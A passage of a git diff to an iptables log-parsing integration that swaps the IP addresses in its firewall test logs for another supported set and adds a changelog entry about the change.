RES=0x00 ACK URGP=0 -2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 -Jan 8 03:37:09 DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.0.2.71 DST=192.0.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.0.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ] -Jan 8 03:37:09 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.36 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 -Jan 8 03:37:57 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0 -Jan 8 03:38:45 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.201 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 -Jan 8 03:39:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.246 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0 -Jan 8 03:40:21 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=203.0.113.208 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 -Jan 8 03:40:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0 -Jan 8 03:41:17 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 -Jan 8 03:41:23 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 -Jan 8 03:43:18 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0 -Jan 8 03:43:42 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=198.51.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0 -Jan 22 09:05:05 ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2001:0db8:0000:0000:0000:0000:0000:0001 DST=2001:0db8:0000:0000:0000:0000:0000:0002 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1 +Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 +2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 +Jan 8 03:37:09 DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.168.2.71 DST=192.168.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.168.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ] +Jan 8 03:37:09 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 +Jan 8 03:37:57 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0 +Jan 8 03:38:45 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 +Jan 8 03:39:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0 +Jan 8 03:40:21 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 +Jan 8 03:40:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0 +Jan 8 03:41:17 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 +Jan 8 03:41:23 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 +Jan 8 03:43:18 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0 +Jan 8 03:43:42 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=192.168.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0 +Jan 22 09:05:05 ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 DST=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1 Jan 22 10:52:34 ubuntu-bionic kernel: [ 307.757925] IN= OUT=enp0s3 MAC=90:10:12:34:56:78:90:10:aa:bb:cc:dd:86:dd:ff:ff SRC=fe80:0000:0000:0000:0084:88ff:feae:790a DST=ff02:0000:0000:0000:0000:0000:0000:0016 LEN=96 TC=0 HOPLIMIT=1 FLOWLBL=0 PROTO=ICMPv6 TYPE=143 CODE=0 MARK=0xd4 -Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=255.55.174.225 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 -Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.0.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 -Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 -Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 -Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 \ No newline at end of file +Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 +Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 +Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 +Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 +Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 \ No newline at end of file diff --git a/packages/iptables/changelog.yml b/packages/iptables/changelog.yml index 4937d1bf5d7..e6532da1ae0 100644 --- a/packages/iptables/changelog.yml +++ b/packages/iptables/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log b/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log index bfd1f3e2989..68d3e68cda8 100644 --- a/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log +++ b/packages/iptables/data_stream/log/_dev/test/pipeline/test-iptables-raw.log @@ -1,21 +1,21 @@ -<161>Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 -<6>2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 -2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 -Jan 8 03:37:09 DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.0.2.71 DST=192.0.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.0.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ] -Jan 8 03:37:09 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.36 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 -Jan 8 03:37:57 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0 -Jan 8 03:38:45 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.201 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 -Jan 8 03:39:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=203.0.113.246 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0 -Jan 8 03:40:21 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=203.0.113.208 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 -Jan 8 03:40:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0 -Jan 8 03:41:17 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 -Jan 8 03:41:23 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=198.51.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 -Jan 8 03:43:18 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=198.51.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0 -Jan 8 03:43:42 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=198.51.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0 -Jan 22 09:05:05 ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2001:0db8:0000:0000:0000:0000:0000:0001 DST=2001:0db8:0000:0000:0000:0000:0000:0002 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1 +<161>Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 +<6>2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 +2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 +Jan 8 03:37:09 DENY: IN=eth0 OUT= MAC=90:10:28:5f:62:24:90:10:18:5a:89:2a:08:00 SRC=192.168.2.71 DST=192.168.2.83 LEN=88 TOS=0x00 PREC=0x00 TTL=118 ID=21684 PROTO=ICMP TYPE=3 CODE=3 [SRC=192.168.2.83 DST=192.168.173.191 LEN=60 TOS=0x00 PREC=0x00 TTL=54 ID=0 DF PROTO=UDP SPT=21458 DPT=62936 LEN=40 ] +Jan 8 03:37:09 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=15743 DF PROTO=TCP SPT=17805 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 +Jan 8 03:37:57 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.198 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=243 ID=17703 PROTO=TCP SPT=47091 DPT=1433 WINDOW=1024 RES=0x00 SYN URGP=0 +Jan 8 03:38:45 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=115 ID=19619 DF PROTO=TCP SPT=59319 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 +Jan 8 03:39:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=240 ID=4255 DF PROTO=TCP SPT=44181 DPT=80 WINDOW=14600 RES=0x00 SYN URGP=0 +Jan 8 03:40:21 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=81.2.69.143 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=110 ID=27150 DF PROTO=TCP SPT=64358 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 +Jan 8 03:40:25 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.160 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=242 ID=7264 PROTO=TCP SPT=58830 DPT=445 WINDOW=1024 RES=0x00 SYN URGP=0 +Jan 8 03:41:17 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.115 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=117 ID=6101 DF PROTO=TCP SPT=51985 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 +Jan 8 03:41:23 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00 SRC=192.168.100.167 DST=172.16.54.114 LEN=52 TOS=0x00 PREC=0x00 TTL=45 ID=6319 DF PROTO=TCP SPT=4099 DPT=445 WINDOW=8192 RES=0x00 SYN URGP=0 +Jan 8 03:43:18 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:9e:ec:2c:71:08:00 SRC=192.168.100.19 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=245 ID=48624 PROTO=TCP SPT=59287 DPT=139 WINDOW=1024 RES=0x00 SYN URGP=0 +Jan 8 03:43:42 example-host kernel: iptables DROP_INPUT: IN=eth0 OUT= MAC=90:10:35:5a:1e:3a:90:10:76:e0:e2:d5:08:00:45:00:00:00:00 SRC=192.168.100.68 DST=172.16.54.114 LEN=40 TOS=0x00 PREC=0x00 TTL=250 ID=54321 PROTO=TCP SPT=53296 DPT=8088 WINDOW=65535 RES=0x00 SYN URGP=0 +Jan 22 09:05:05 ubuntu-bionic kernel: [16571.459614] IN= OUT=lo SRC=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 DST=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 LEN=104 TC=0 HOPLIMIT=64 FLOWLBL=868225 PROTO=ICMPv6 TYPE=128 CODE=0 ID=3427 SEQ=1 Jan 22 10:52:34 ubuntu-bionic kernel: [ 307.757925] IN= OUT=enp0s3 MAC=90:10:12:34:56:78:90:10:aa:bb:cc:dd:86:dd:ff:ff SRC=fe80:0000:0000:0000:0084:88ff:feae:790a DST=ff02:0000:0000:0000:0000:0000:0000:0016 LEN=96 TC=0 HOPLIMIT=1 FLOWLBL=0 PROTO=ICMPv6 TYPE=143 CODE=0 MARK=0xd4 -Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=255.55.174.225 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 -Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.0.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 -Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2857 RES=0x00 ACK URGP=0 -Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2853 RES=0x00 ACK URGP=0 -Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.0.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 WINDOW=2850 RES=0x00 ACK URGP=0 \ No newline at end of file +Jan 5 20:17:05 MainFirewall kernel: [LAN_LOCAL-default-A]IN=eth0.90 OUT= MAC=90:10:92:6e:ea:a7:90:10:73:ba:d6:77:08:00:45:fc:02:1c SRC=192.168.48.137 DST=81.2.69.143 LEN=540 TOS=0x1C PREC=0xE0 TTL=64 ID=27223 PROTO=UDP SPT=48689 DPT=48689 LEN=520 +Jan 5 20:17:01 MainFirewall kernel: [WAN_OUT-2000-A]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:24:67:f4:89:08:00 SRC=192.168.134.158 DST=192.168.2.25 LEN=265 TOS=0x00 PREC=0x00 TTL=63 ID=51768 DF PROTO=TCP SPT=43189 DPT=443 WINDOW=159 RES=0x00 ACK PSH URGP=0 +Jan 5 20:17:01 MainFirewall kernel: [source-dest-default-D]IN=eth0 OUT=eth2 MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=192.168.110.116 DST=192.168.2.25 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=50093 DPT=1443 